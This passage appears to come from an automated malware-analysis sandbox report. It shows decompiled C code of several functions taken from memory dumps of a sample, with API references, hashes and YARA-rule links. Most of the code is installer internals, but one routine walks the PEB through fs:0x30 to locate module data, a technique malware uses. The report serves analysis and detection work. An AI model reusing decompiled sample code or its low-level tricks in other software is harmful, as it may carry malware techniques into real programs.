						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6a8 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6a8;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6a8 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00407127
0x0040712f
0x00407133
0x00407135
0x00407138
0x0040713a
0x0040713a
0x0040713c
0x00407143
0x00407145
0x00407145
0x0040714b
0x00407160
0x00407168
0x0040716a
0x0040716c
0x0040716f
0x00407170
0x00407170
0x00407176
0x00000000
0x00000000
0x00407178
0x0040717b
0x00000000
0x00000000
0x00000000
0x0040717b
0x0040717f
0x00407182
0x00407184
0x00407184
0x00407187
0x0040718d
0x0040718e
0x00000000
0x00000000
0x00000000
0x0040718e
0x00407193
0x00407196
0x00407198
0x00407198
0x0040719e
0x004071a0
0x004071b1
0x004071a4
0x004071a8
0x0040744d
0x00000000
0x0040744d
0x004071ae
0x004071af
0x004071af
0x004071b7
0x004071ba
0x004071be
0x004071c0
0x004071c2
0x004071c5
0x00000000
0x00000000
0x004071cd
0x004071d3
0x004071d5
0x004071d7
0x004071d8
0x004071ed
0x004071ed
0x004071f0
0x004071f2
0x004071f2
0x004071f4
0x004071f9
0x004071fb
0x00407202
0x00407204
0x0040720c
0x0040720c
0x0040720e
0x0040720f
0x0040721e
0x00407222
0x00407226
0x00407229
0x0040722c
0x00407231
0x00407234
0x0040723a
0x00407241
0x00407247
0x00407440
0x00407440
0x00407445
0x00407454
0x00000000
0x00000000
0x00000000
0x00407445
0x00407254
0x00407257
0x0040725a
0x0040725d
0x00407261
0x00000000
0x00000000
0x0040726c
0x0040726f
0x00407270
0x00407272
0x00407278
0x0040727b
0x00000000
0x00000000
0x00407281
0x00407282
0x00407285
0x00407288
0x0040728b
0x00407291
0x00407293
0x00407293
0x0040729b
0x0040729f
0x004072a4
0x004072c9
0x004072cf
0x004072d1
0x004072d3
0x004072d6
0x004072df
0x00000000
0x00000000
0x004072a6
0x004072a6
0x004072af
0x004072b3
0x00000000
0x00000000
0x004072c4
0x004072c4
0x004072c7
0x00000000
0x00000000
0x004072b7
0x004072ba
0x004072bc
0x004072c0
0x00000000
0x00000000
0x004072c2
0x004072c2
0x00000000
0x004072c4
0x004072e8
0x004072ee
0x004072f8
0x004072fa
0x004072ff
0x00407301
0x00407337
0x00407303
0x00407303
0x00407306
0x00407309
0x00407313
0x00407316
0x0040731d
0x00407328
0x0040732f
0x0040732f
0x00407339
0x0040733c
0x0040733e
0x00407344
0x00407344
0x0040734d
0x00407350
0x00407355
0x00407364
0x0040736c
0x00407371
0x00407395
0x0040739d
0x004073a1
0x004073a7
0x00407373
0x00407381
0x00407384
0x0040738a
0x0040738a
0x004073ab
0x00407366
0x00407366
0x00407366
0x004073bc
0x004073c0
0x004073cc
0x004073c7
0x004073ca
0x004073ca
0x004073d4
0x004073d9
0x004073e1
0x004073dd
0x004073df
0x004073df
0x004073e7
0x004073e9
0x004073f0
0x004073fa
0x00407404
0x00407420
0x00407424
0x00407269
0x0040726f
0x00407270
0x00407272
0x00407278
0x0040727b
0x00000000
0x00000000
0x00000000
0x0040727b
0x00000000
0x00000000
0x00000000
0x00000000
0x00407406
0x00407406
0x00407406
0x0040740b
0x00407414
0x0040741d
0x00000000
0x0040741d
0x0040742a
0x0040742a
0x0040742d
0x00407434
0x00407437
0x00000000
0x0040725a
0x004071da
0x004071dc
0x004071dc
0x004071e0
0x004071e3
0x004071e4
0x004071e4
0x00000000
0x004071dc
0x00407150
0x00407156
0x00000000

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95

Uniqueness

Uniqueness Score: -1.00%

Function 024434C3, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.251064774.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction ID: 5425ba191288e626fad4b6fe8b89ef2457d3f47ae171de105786d95e9eaa4185
Opcode Fuzzy Hash: 4190573f41b5aaf3d97b7b4ebc131eb1ca3e1ee9d0b453c61c3dcd2709d33944
Instruction Fuzzy Hash: AD014D78A10208EFDB51DF99C58099DBBF4FB08624F6084D6E814E7711D731EE50DB40

Uniqueness

Uniqueness Score: -1.00%

Function 024431FE, Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.251064774.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction ID: 58c6f5837427d6eca2c2deaad74ce6c6656098581891570576efec04afcca601
Opcode Fuzzy Hash: f9ed70d17b65b173f63ea8bde167bd4dbe7c19cd1b27e585218ed96e6e4df4c6
Instruction Fuzzy Hash: 42D001392A1A48CFC241CF4CD084E40B3F8FB0DA20B068092FA0A8BB32C334FC00DA80

Uniqueness

Uniqueness Score: -1.00%

Function 10001110, Relevance: .0, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001110() {

				return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
			}

0x10001123

Memory Dump Source

Source File: 00000000.00000002.251980600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.251975485.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.251984838.0000000010002000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 00404B80, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404B80(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x42f468;
				_v28 =  *0x42f434 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42f43d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t298 = 0 | _a8 != 0x00000413;
								_t250 = E00404ACE(_v8, _a8 != 0x413);
								_t325 = _t250;
								if(_t325 >= 0) {
									_t99 = _v24 + 8; // 0x8
									_t298 = _t250 * 0x418 + _t99;
									_t252 =  *_t298;
									if((_t252 & 0x00000010) == 0) {
										if((_t252 & 0x00000040) == 0) {
											_t253 = _t252 ^ 0x00000001;
										} else {
											_t259 = _t252 ^ 0x00000080;
											if(_t259 >= 0) {
												_t253 = _t259 & 0x000000fe;
											} else {
												_t253 = _t259 | 0x00000001;
											}
										}
										 *_t298 = _t253;
										E0040117D(_t325);
										_a12 = _t325 + 1;
										_a16 =  !( *0x42f43c) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t298 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x42a874;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x42a888;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x42a874 = 0;
								 *0x42a888 = 0;
								 *0x42f4a0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42f43d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404B4E();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x42a888;
									_t206 =  *0x42f468;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42f46c <= 0) {
										L86:
										if( *0x42f42c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x42ebfc; // 0x82bae7
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404A89(0x3ff, 0xfffffffb, E00404AA1(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42f46c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x42a888);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x42f4a0 = _a4;
					_v20 = 2;
					 *0x42a888 = GlobalAlloc(0x40,  *0x42f46c << 2);
					_t264 = LoadImageA( *0x42f420, 0x6e, 0, 0, 0, 0);
					 *0x42a87c =  *0x42a87c | 0xffffffff;
					_v16 = _t264;
					 *0x42a884 = SetWindowLongA(_v8, 0xfffffffc, E00405192);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x42a874 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x42a874);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E0040618A(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E0040417B(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E0040417B(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42f46c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x42a888 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x42a888 + _t329 * 4) = _t290;
									_v16 =  *( *0x42a888 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42f46c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004041B0(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004041B0(_v12);
								L93:
								return E004041E2(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404b9e
0x00404ba6
0x00404bae
0x00404bb4
0x00404bcc
0x00404bcf
0x00404bd0
0x00404dfd
0x00404e04
0x00404e18
0x00404e06
0x00404e08
0x00404e0b
0x00404e0c
0x00404e13
0x00404e13
0x00404e24
0x00404e32
0x00404e35
0x00404e4b
0x00404ec0
0x00404ec3
0x00404ec5
0x00404ecf
0x00404edd
0x00404edd
0x00404edf
0x00404ee9
0x00404eef
0x00404ef2
0x00404ef5
0x00404f10
0x00404ef7
0x00404f01
0x00404f01
0x00404ef5
0x00404ee9
0x00000000
0x00404ec3
0x00404e50
0x00404e5b
0x00404e60
0x00404e67
0x00404e6c
0x00404e70
0x00404e7b
0x00404e7b
0x00404e7f
0x00404e83
0x00404e87
0x00404e9a
0x00404e89
0x00404e89
0x00404e90
0x00404e96
0x00404e92
0x00404e92
0x00404e92
0x00404e90
0x00404e9e
0x00404ea0
0x00404eb3
0x00404eb6
0x00404eb9
0x00404eb9
0x00404e83
0x00000000
0x00404e70
0x00404e52
0x00404e59
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00404f13
0x00404f13
0x00404f1a
0x00404f8b
0x00404f93
0x00404f9b
0x00404f9b
0x00404fa4
0x00404fa6
0x00404fad
0x00404fb0
0x00404fb0
0x00404fb6
0x00404fbd
0x00404fc0
0x00404fc0
0x00404fc6
0x00404fcc
0x00404fd2
0x00404fd2
0x00404fdf
0x0040513f
0x00405146
0x00405163
0x00405169
0x0040517b
0x0040517b
0x00000000
0x00404fe5
0x00404fe7
0x00404fec
0x00404ff1
0x00404ff6
0x00404ff8
0x00404ff8
0x00404ff9
0x00404ffa
0x00404ffc
0x00404ffc
0x00405004
0x00405045
0x00405047
0x00405057
0x0040505a
0x0040505f
0x00405066
0x00405069
0x0040510b
0x00405113
0x0040511b
0x0040511b
0x00405121
0x00405129
0x0040513a
0x0040513a
0x00000000
0x00405129
0x0040506f
0x00405072
0x00405078
0x0040507d
0x0040507f
0x00405081
0x00405087
0x0040508e
0x00405093
0x0040509a
0x0040509d
0x0040509d
0x004050a4
0x004050b0
0x004050b4
0x004050b6
0x004050b6
0x004050a6
0x004050a8
0x004050a8
0x004050d6
0x004050e2
0x004050f1
0x004050f1
0x004050f3
0x004050f6
0x004050ff
0x00000000
0x00405006
0x00405011
0x00405014
0x00405019
0x0040501b
0x0040501f
0x0040502f
0x00405039
0x0040503b
0x0040503e
0x00000000
0x00000000
0x00000000
0x00000000
0x00405021
0x00405021
0x00405027
0x00405029
0x00405029
0x0040502a
0x0040502b
0x00000000
0x00405021
0x00405004
0x00404fdf
0x00404f22
0x00000000
0x00404f38
0x00404f42
0x00404f47
0x00000000
0x00000000
0x00404f59
0x00404f5e
0x00404f6a
0x00404f6a
0x00404f6c
0x00404f7b
0x00404f7d
0x00404f81
0x00404f84
0x00000000
0x00404f84
0x00404f22
0x00404bd6
0x00404bd9
0x00404bdc
0x00404bec
0x00404bff
0x00404c0a
0x00404c10
0x00404c1e
0x00404c31
0x00404c36
0x00404c41
0x00404c4a
0x00404c60
0x00404c70
0x00404c7c
0x00404c7c
0x00404c81
0x00404c87
0x00404c89
0x00404c8c
0x00404c91
0x00404c96
0x00404c98
0x00404c98
0x00404cb8
0x00404cb8
0x00404cba
0x00404cbb
0x00404cc0
0x00404cc6
0x00404cca
0x00404ccf
0x00404cd7
0x00404cdb
0x00404ce0
0x00404ce5
0x00404ced
0x00404cf0
0x00404dbf
0x00404dd2
0x00000000
0x00404cf6
0x00404cf9
0x00404cfc
0x00404cff
0x00404cff
0x00404d04
0x00404d0d
0x00404d10
0x00404d14
0x00404d17
0x00404d1a
0x00404d23
0x00404d2c
0x00404d2f
0x00404d32
0x00404d35
0x00404d73
0x00404d9e
0x00404d75
0x00404d84
0x00404d84
0x00404d37
0x00404d3a
0x00404d48
0x00404d52
0x00404d5a
0x00404d61
0x00404d6c
0x00404d6c
0x00404d35
0x00404da4
0x00404da5
0x00404db1
0x00404db1
0x00404dbd
0x00404dd8
0x00404ddb
0x00404df8
0x00000000
0x00404ddd
0x00404de2
0x00404deb
0x0040517d
0x0040518f
0x0040518f
0x00404ddb
0x00000000
0x00404dbd
0x00404cf0

APIs

GetDlgItem.USER32 ref: 00404B97
GetDlgItem.USER32 ref: 00404BA4
GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
LoadImageA.USER32 ref: 00404C0A
SetWindowLongA.USER32 ref: 00404C24
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404C4A
SendMessageA.USER32 ref: 00404C60
SendMessageA.USER32 ref: 00404C6C
SendMessageA.USER32 ref: 00404C7C
DeleteObject.GDI32(00000110), ref: 00404C81
SendMessageA.USER32 ref: 00404CAC
SendMessageA.USER32 ref: 00404CB8
SendMessageA.USER32 ref: 00404D52
SendMessageA.USER32 ref: 00404D82

Part of subcall function 004041B0: SendMessageA.USER32 ref: 004041BE

SendMessageA.USER32 ref: 00404D96
GetWindowLongA.USER32 ref: 00404DC4
SetWindowLongA.USER32 ref: 00404DD2
ShowWindow.USER32(?,00000005), ref: 00404DE2
SendMessageA.USER32 ref: 00404EDD
SendMessageA.USER32 ref: 00404F42
SendMessageA.USER32 ref: 00404F57
SendMessageA.USER32 ref: 00404F7B
SendMessageA.USER32 ref: 00404F9B
ImageList_Destroy.COMCTL32(?), ref: 00404FB0
GlobalFree.KERNEL32 ref: 00404FC0
SendMessageA.USER32 ref: 00405039
SendMessageA.USER32 ref: 004050E2
SendMessageA.USER32 ref: 004050F1
InvalidateRect.USER32(?,00000000,00000001), ref: 0040511B
ShowWindow.USER32(?,00000000), ref: 00405169
GetDlgItem.USER32 ref: 00405174
ShowWindow.USER32(00000000), ref: 0040517B

Strings

N, xrefs: 00404E1B
M, xrefs: 00404D3A
, xrefs: 00405153

Memory Dump Source

Source File: 00000000.00000002.250695784.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.250691921.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250703820.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250708634.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250715810.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250726496.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250731472.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.250736343.0000000000438000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.250740572.000000000043A000.00000002.00020000.sdmp Download File

Similarity

